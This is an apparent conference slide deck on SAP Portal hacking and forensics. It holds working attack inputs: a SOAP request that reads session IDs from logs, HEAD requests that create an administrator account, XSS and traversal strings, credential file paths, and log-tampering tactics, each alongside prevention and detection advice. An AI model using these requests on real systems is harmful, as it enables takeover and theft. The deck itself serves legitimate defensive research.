Invest in SAP security to secure investments

Invest in security
to secure investments
SAP Portal: Hacking and forensics

Dmitry Chastukhin Director of SAP pentest/research team
Evgeny Neyolov Security analyst, (anti)forensics research
ERPScan
Developing software for SAP security monitoring
Talks at 35+ security conferences worldwide: BlackHat
(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
First to develop software for NetWeaver J2EE assessment
The only solution to assess all areas of SAP Security
Research team with experience in different areas of security
from ERP and web security to mobile, embedded devices, and
critical infrastructure, accumulating their knowledge on SAP
research.
Leading SAP AG partner in the field of discovering security
vulnerabilities by the number of found vulnerabilities
erpscan.com
ERPScan invest in security to secure investments
Dmitry Chastukhin
Yet another security

researcher
Business application security
expert
erpscan.com
Agenda
SAP security
SAP forensics WTF?!

Say hello to SAP Portal
Breaking SAP Portal

Catch me if you can
Conclusion
erpscan.com
SAP
The most popular business application

More than 180000 customers worldwide
More than 70% of Forbes 500 run SAP
More than 40% of ERP market in Poland
erpscan.com
SAP security
Espionage
Stealing financial information
Stealing corporate secrets
Stealing supplier and customer lists
Stealing HR data
Fraud
False transactions
Modification of master data
Sabotage
Denial of service
Modification of financial reports
Access to technology network (SCADA) by trust relations
erpscan.com
SAP security
35
30
25
20
15
10
BlackHat
Defcon
HITB
RSA
CONFidence
DeepSec
Hacktivity
Troopers
Source
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
2013
Source: SAP Security in Figures 2013

LINK
erpscan.com
How easy? SAP Security Notes
More than 2600 in total
erpscan.com
Is it remotely exploitable?
sapscan.com
> 5000 non-web SAP services exposed in the world

including Dispatcher, Message server, SapHostControl, etc.
erpscan.com
What about other services?

9
World
8
SAP Dispatcher
erpscan.com
SAP MMC
SAP Message Server
SAP HostControl
SAP ITS Agate
SAP Message Server

httpd
10
What about unpublished threats?

Companies are not interested in publishing information about
their breaches
There are a lot of internal breaches thanks to unnecessarily
given authorizations (An employee by mistake buys hundreds of
excavators instead of ten)
There are known stories about backdoors left by developers in
custom ABAP code
How can you be sure that, if a breach occurs, you can find
evidence?
erpscan.com
11
SAP Forensics
If there are no attacks, it doesnt mean anything
Companies dont like to share it

Companies dont use security audit ~10%
Even if used, nobody manages it ~5%
Even if managed, no correlation ~1%
erpscan.com
12
Typical SAP audit options
ICM log icm/HTTP/logging_0

Security audit log in ABAP
Table access logging rec/client
Message Server log ms/audit
SAP Gateway access log
70%
10%
4%
2%
2%
* The percentage of companies is based on our security assessments and product
implementations.
erpscan.com
13
What do we see?
A lot of research
Real attacks
Lack of logging practice
Many vulnerabilities are hard to close We need to monitor
them, at least
erpscan.com
14
What do we need to monitor?

External attacks on SAP
* Ideally, we should control everything, but this talk has limits, so lets focus on
the most critical areas.
Attack users and SAP GUI
Awareness
SAProuter
Secure configuration and patch management
Exposed SAP services
Disable them
SAP Portal and WEB
Too much issues and custom

configuration
Can be 0-days
Need to concentrate on this area
erpscan.com
15
Say hello to Portal

Point of web access
to SAP systems
Point of web access to
other corporate systems
Way for attackers
to get access to SAP
from the Internet
erpscan.com
16
EP architecture
erpscan.com
17
Okay, okay. SAP Portal is important, and

it has many links to other modules.
So what?
erpscan.com
18
SAP Logging
If you are running an ABAP + Java installation of Web AS with
SAP Web Dispatcher as a load balancing solution, you can safely
disable logging of HTTP requests and responses on J2EE Engine,
and use the corresponding CLF logs of SAP Web Dispatcher. This
also improves the HTTP communication performance. The only
drawback of using the Web Dispatchers CLF logs is that no
information is available about the user executing the request
(since the user is not authenticated on the Web Dispatcher, but
on the J2EE Engine instead).
SOURCE: SAP HELP
*Not the only. There are many complex attacks with POST requests.
erpscan.com
19
SAP J2EE Logging

Categories of system events recording:
System all system related security and administrative logs
Applications all system events related to business logic
Performance reserved for single activity tracing
Default location of these files in your file system:

\usr\sap\<sid>\<id>\j2ee\cluster\<node>\log\
erpscan.com
20
SAP J2EE Logging

The developer trace files of the Java instance
<SID>\<instance name>\work
The developer trace files of the central services

<SID>\<instance name>\work
<SID>\<instance name>\log
Java server logs

<SID>\<instance name>\j2ee\cluster\server<n>\log
erpscan.com
21
Full logging is not always the best option
erpscan.com
22
SAP Management Console
erpscan.com
23
SAP MMC: centralized system management

SAP MMC has remote commands
Commands are simple SOAP requests
Allowing to see the trace and log messages
Its not bad if you only use it sometimes and delete logs after
use, but
erpscan.com
24
What can we find in logs?

Right!
The file userinterface.log contains calculated JSESIONID
But
The attacker must have credentials to read the log file
WRONG!
erpscan.com
25

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session
xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
<enableSession>true</enableSession>
</sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
<filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
<filter/>
<language/>
<maxentries>%COUNT%</maxentries>
<statecookie>EOF</statecookie>
</ns1:ReadLogFile>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
erpscan.com
26
Prevention
Dont use TRACE_LEVEL = 3

Delete traces when work is finished
Limit access to dangerous methods
Install notes 927637 and 1439348
Mask security-sensitive data in HTTP access log
LINK to SAP HELP

erpscan.com
27
Prevention
The HTTP Provider service can mask securitysensitive URL parameters, cookies, or headers
By default, only for the headers listed below
Path Parameter: jsessionid
Request Parameters: j_password, j_username,
j_sap_password, j_sap_again, oldPassword,
confirmNewPassword,ticket
HTTP Headers: Authorization, Cookie (JSESSIONID,
MYSAPSSO2)
LINK to SAP HELP

erpscan.com
28
SAP NetWeaver J2EE
erpscan.com
29
Access Control
Declarative
Programmatic
By WEB.XML
By UME
Web Dynpro
Portal iViews
J2EE Web apps
erpscan.com
- programmatic
- programmatic
- declarative
30
Access Control
The central entity in the J2EE authorization model is the security
role
Programmers define the application-specific roles in the J2EE
deployment descriptor
web.xml
erpscan.com
web-j2ee-engine.xml
31
web.xml
<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CriticalAction</</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>administrator</role-name>
</auth-constraint>
</security-constraint>
Verb Tampering
erpscan.com
32
Verb Tampering
If we are trying to get access to an application using GET we
need a login:pass and administrator role
What if we try to get access to application using HEAD instead
GET?
PROFIT!
Did U know about ctc?
erpscan.com
33
Verb Tampering
Need Admin account in SAP Portal?
Just send two HEAD requests
Create new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;
CREATEUSER;USERNAME=CONF,PASSWORD=idence
Add the user CONF to the group Administrators

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;
ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
* Works when UME uses JAVA database.

erpscan.com
34
Prevention
Install SAP notes 1503579, 1616259, 1589525,

1624450
Install other SAP notes about Verb Tampering
Scan applications with ERPScan WEB.XML
checker
Disable the applications that are not necessary
erpscan.com
35
Investigation
[Apr 3, 2013 1:23:59 AM
] - 192.168.192.14
: GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM
] - 192.168.192.14
: HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM

] - 192.168.192.14
: HEAD
/ctc/ConfigServlet?param=com.sap.ctc.util.Use
rConfig;CREATEUSER;USERNAME=CONF,PASSWORD=ide
nce HTTP/1.0 200 0
j2ee\cluster\<node>\log\system\httpaccess\responses.trc
erpscan.com
36
web.xml
<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servletclass>
</servlet>
GET /admin/critical/CriticalAction
<servlet-mapping>
<servlet-name>CriticalAction</</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping
<security-constraint>
GET /servlet/com.sap.admin.Critical.Action
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
<http-method>HEAD</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>administrator</role-name>
</auth-constraint>
Invoker servlet
</security-constraint>
erpscan.com
37
Invoker Servlet
Want to execute an OS command on J2EE server remotely?
Maybe upload a backdoor in a Java class?
Or sniff all traffic?
Still remember ctc?
erpscan.com
38
Invoker Servlet
erpscan.com
39
Prevention
Update to the latest patch 1467771, 1445998

EnableInvokerServletGlobally must be false
Check all WEB.XML files with ERPScan WEBXML
checker
erpscan.com
40
Investigation
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#13649960352
03#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sa
p.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA
Transaction :
[024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_A
pplication_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.ut
il.SecurityAudit#Plain###Guest
| USER.CREATE |
USER.PRIVATE_DATASOURCE.un:CONF
|
| SET_ATTRIBUTE:
uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420
62#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.service
s.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000
c29c26033#Thread[Thread50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.
sap.engine.services.security.roles.audit#Java###{0}:
Authorization check for caller assignment to J2EE security role
[{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
erpscan.com
41
Investigation
erpscan.com
41
XSS
Many XSSs in Portal
But sometimes HttpOnly
But when we exploit XSS, we can use the features of SAP Portal
EPCF
erpscan.com
43
EPCF
EPCF provides a JavaScript API designed for the client-side
communication between portal components and the portal core
framework
Enterprise Portal Client Manager (EPCM)
iViews can access the EPCM object from every portal page
or IFrame
Every iView contains the EPCM object
<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person");
</SCRIPT>
For example, EPCF used for transient user data buffer for iViews
erpscan.com
44
Prevention
Install SAP note 1656549
erpscan.com
45
Investigation
#Plain###192.168.192.26 : GET
/irj/servlet/prt/portal/prtroot/com.sap.porta
l.usermanagement.admin.UserMapping?systemid=M
S_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(
%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
j2ee\cluster\<node>\log\system\httpaccess\res
ponses.trc
erpscan.com
46
Web Dynpro JAVA

Web Dynpro unauthorized modifications
For example:
somebody steals an account using XSS/CSRF/Sniffing
then tries to modify the severity level of logs
erpscan.com
47
Web Dynpro JAVA
LINK to SAP HELP

erpscan.com
48
Investigation
No traces of change in default log files
\cluster\server0\log\system\httpaccess\responses.log
Web Dynpro sends all data by POST, and we only see GET URLs in
responses.log
But sometimes we can find information by indirect signs
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET
/webdynpro/resources/sap.com/tc~lm~webadmin~log_config
~wd/Components/com.sap.tc.log_configurator.LogConfigur
ator/warning.gif HTTP/1.1 200 110
The client loaded images from the server during some changes
erpscan.com
49
Investigation
Most actions have icons

They have to be loaded from the server
Usually, legitimate users have them all in cache
Attackers usually dont have them, so they make requests to the
server
Thats how we can identify potentially malicious actions
But there should be correlation with a real users activity
False positives are possible:
New legitimate user
Old user clears cache
Other
erpscan.com
50
Directory traversal
FIX
erpscan.com
51
Directory traversal fix bypass
erpscan.com
52
Prevention
erpscan.com
53
Investigation
/../
!252f..!252f
erpscan.com
54
Breaking SAP Portal

Found a file in the OS of SAP Portal with the encrypted
passwords for administration and DB
Found a file in the OS of SAP Portal with keys to decrypt
passwords
Found a vulnerability (another one ;)) which allows reading the
files with passwords and keys
Decrypt passwords and log into Portal
PROFIT!
erpscan.com
55
Read the file

How can we read the file?
Directory Traversal
OS Command execution
XML External Entity (XXE)
erpscan.com
56
XXE in Portal: Details
Injection of malicious requests into XML packets

Can lead to unauthorized file read, DoS, SSRF
There is an XXE vulnerability in SAP Portal
Can be exploited by modification of POST request
It is possible to read any file from OS and much more
erpscan.com
57
XXE in Portal
erpscan.com
58
XXE in Portal
erpscan.com
59
XXE
Error based XXE

erpscan.com
60
XXE in Portal: Result

We can read any file
Including config with passwords
The SAP J2EE Engine stores the database user SAP<SID>DB; its
password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
erpscan.com
61
Where are the passwords?

(config.properties)
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
erpscan.com
62
Where are the passwords?

(config.properties)
system.name=TTT
data/SecStore.key
nt/ojdbc14.jar
erpscan.com
63
SecStore.properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwu
eur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgq
Dp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI
0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr
4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV7
5eC6/5S3E
But where is the key?
erpscan.com
64
config.properties
system.name=TTT
data/SecStore.key
nt/ojdbc14.jar
erpscan.com
65
Get the password

We have an encrypted password
We have a key to decrypt it
We got the J2EE admin and JDBC

login:password!
erpscan.com
66
Prevention

Restrict read access to files SecStore.properties
and SecStore.key
erpscan.com
67
Investigation
POST
/irj/servlet/prt/portal/prteventname/HtmlbE
vent/prtroot/pcd!3aportal_content!2fadminis
trator!2fsuper_admin!2fsuper_admin_role!2fc
om.sap.portal.content_administration!2fcom.
sap.portal.content_admin_ws!2fcom.sap.km.Ad
minContent!2fcom.sap.km.AdminContentExplore
r!2fcom.sap.km.AdminExplorer/ HTTP/1.1
erpscan.com
68
Investigation
The only one way to get HTTP POST request values is to enable
HTTP Trace
Visual Administrator Dispatcher HTTP Provider
Properties: HttpTrace = enable
For 6.4 and 7.0 SP12 and lower:
On Dispatcher:
/j2ee/cluster/dispatcher/log/defaultTrace.trc
On Server
\j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
For 7.0 SP13 and higher:

/j2ee/cluster/dispatcher/log/services/http/req_resp.trc
Manually analyze all requests for XXE attacks

erpscan.com
69
Malicious file upload: Attack

Knowledge management allows uploading to the server
different types of files that can store malicious content
Sometimes, if guest access is allowed, it is possible to upload
any file without being an authenticated user
For example, it can be an HTML file with JavaScript that steals
cookies
erpscan.com
70
erpscan.com
71
erpscan.com
72
Malicious file upload: Forensics

[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST
/irj/servlet/prt/portal/prteventname/HtmlbEvent/prt
root/pcd!3aportal_content!2fspecialist!2fcontentman
ager!2fContentManager!2fcom.sap.km.ContentManager!2
fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDoc
Explorer!2fcom.sap.km.DocsExplorer/documents
HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET
/irj/go/km/docs/etc/public/mimes/images/html.gif
HTTP/1.1 200 165
*Again, images can help us.
erpscan.com
73
Malicious file upload: Prevention
Enable File Extension and Size Filter:

System Administration System Configuration
Content Management Repository Filters Show
Advanced Options File Extension and Size Filter
Select either the All repositories parameter or at least
one repository from the repository list in
the Repositories parameter
erpscan.com
74
Malicious file upload: Prevention
Enable Malicious Script Filter:

System Administration System Configuration
Content Management Repository Filters Show
Advanced Options Malicious Script Filter
The filter also detects executable scripts in files that are
being modified and encodes them when they are saved
enable Forbidden Scripts. Comma-separated list of banned
script tags that will be encoded when the filter is applied
enable the Send E-Mail to Administrator option
erpscan.com
75
Portal post-exploitation
Lot of links to other systems in corporate LAN
Using SSRF, attackers can get access to these systems
What is
erpscan.com
SSRF?
76
SSRF History: Basics
We send Packet A to Service A

Service A initiates Packet B to service B
Services can be on the same or different hosts
We can manipulate some fields of packet B within packet A
Various SSRF attacks depend on how many fields we can control
on packet B
Packet A
Packet B
erpscan.com
77
Partial Remote SSRF:

HTTP attacks on other services
HTTP Server
Corporate
network
Direct attack
GET /vuln.jsp
SSRF Attack
Get /vuln.jst
SSRF Attack
erpscan.com
78
Gopher uri scheme
Using gopher:// uri scheme, it is possible to send TCP

packets
Exploit OS vulnerabilities
Exploit old SAP application vulnerabilities
Bypass SAP security restrictions
Exploit vulnerabilities in local services
More info in our BH2012 presentation:

SSRF vs. Business Critical Applications
LINK
erpscan.com
79
Portal post-exploitation
erpscan.com
80
Anti-forensics
erpscan.com
81
Anti-forensics
Flooding
Deleting
Changing
erpscan.com
82
Anti-forensics
Log flooding
5 active logs
Maximum log file size is 10 Mb
Archiving when all logs reach the maximum size
If file.0.log -> max size then open file.1.log
If file.4.log -> max size then zip all and backup
Rewriting the same files after archiving
erpscan.com
83
Anti-forensics
Log deleting
SAP locks write access to the only one active log
SAP allows reading/writing logs, so it is possible to delete them
It could compromise the attackers presence
Log changing
SAP locks write access only to the one active log
It is possible to write into any other log file
erpscan.com
84
Securing SAP Portal
Patching
Secure configuration
Enabling HTTP Trace with masking
Malicious script filter
Log archiving
Additional place for log storage
Monitoring of security events
Own scripts, parse common patterns
ERPScan has all existing web vulns/0-day patterns
erpscan.com
85
Conclusion
It is possible to protect yourself from these kinds of issues,
and we are working close with SAP to keep customers secure
SAP Guides
Regular security assessments
Monitoring technical security
ABAP code review

Segregation of Duties
Security events monitoring
Its all in your hands
Future work
I'd like to thank SAP's Product Security Response Team for the
great cooperation to make SAP systems more secure. Research
is always ongoing, and we can't share all of it today. If you want
to be the first to see new attacks and demos, follow us at
@erpscan and attend future presentations:
July 31 BlackHat (Las Vegas, USA)
erpscan.com
87
Web:
www.erpscan.com
e-mail: info@erpscan.com
Twitter:
@erpscan
@_chipik
@neyolov

Invest in SAP security to secure investments

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Invest in SAP security to secure investments

Uploaded by

Copyright:

Available Formats

Invest in security

SAP Portal: Hacking and forensics

ERPScan invest in security to secure investments

Yet another security

ERPScan invest in security to secure investments

SAP forensics WTF?!

Breaking SAP Portal

ERPScan invest in security to secure investments

The most popular business application

ERPScan invest in security to secure investments

ERPScan invest in security to secure investments

Source: SAP Security in Figures 2013

ERPScan invest in security to secure investments

How easy? SAP Security Notes

More than 2600 in total

ERPScan invest in security to secure investments

> 5000 non-web SAP services exposed in the world

ERPScan invest in security to secure investments

What about other services?

SAP Message Server

SAP ITS Agate

ERPScan invest in security to secure investments

SAP Message Server

What about unpublished threats?

ERPScan invest in security to secure investments

Companies dont like to share it

ERPScan invest in security to secure investments

Typical SAP audit options

ICM log icm/HTTP/logging_0

* The percentage of companies is based on our security assessments and product

ERPScan invest in security to secure investments

ERPScan invest in security to secure investments

What do we need to monitor?

Attack users and SAP GUI

Secure configuration and patch management

Exposed SAP services

SAP Portal and WEB

Too much issues and custom

ERPScan invest in security to secure investments

Say hello to Portal

ERPScan invest in security to secure investments

ERPScan invest in security to secure investments

Okay, okay. SAP Portal is important, and

ERPScan invest in security to secure investments

ERPScan invest in security to secure investments

SAP J2EE Logging

Default location of these files in your file system:

ERPScan invest in security to secure investments

SAP J2EE Logging

The developer trace files of the central services

Java server logs

ERPScan invest in security to secure investments

Full logging is not always the best option

ERPScan invest in security to secure investments

SAP Management Console

ERPScan invest in security to secure investments

SAP Management Console

SAP MMC: centralized system management

ERPScan invest in security to secure investments

SAP Management Console

What can we find in logs?

ERPScan invest in security to secure investments

SAP Management Console